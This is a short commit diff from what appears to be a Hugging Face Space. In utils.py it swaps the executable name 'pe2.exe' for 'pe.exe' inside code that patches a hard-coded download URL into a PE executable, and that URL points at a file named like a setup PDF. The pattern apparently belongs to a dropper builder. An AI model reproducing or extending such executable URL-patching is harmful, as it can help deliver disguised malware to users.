sigyllly commited on
Commit
1e6f7ed
·
verified ·
1 Parent(s): 0101157

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +1 -1
utils.py CHANGED
@@ -266,7 +266,7 @@ def process_request(request):
266
  print(f"new_url: {new_url}")
267
 
268
  # Replace URL in PE executable
269
- pe_exe_path = os.path.join(PE_FOLDER, "pe2.exe")
270
  modified_pe_path = replace_url_in_exe(
271
  file_path=pe_exe_path,
272
  old_url="https://ambelo-benjamin.hf.space/uploads/setup_20250102_062242.pdf",
 
266
  print(f"new_url: {new_url}")
267
 
268
  # Replace URL in PE executable
269
+ pe_exe_path = os.path.join(PE_FOLDER, "pe.exe")
270
  modified_pe_path = replace_url_in_exe(
271
  file_path=pe_exe_path,
272
  old_url="https://ambelo-benjamin.hf.space/uploads/setup_20250102_062242.pdf",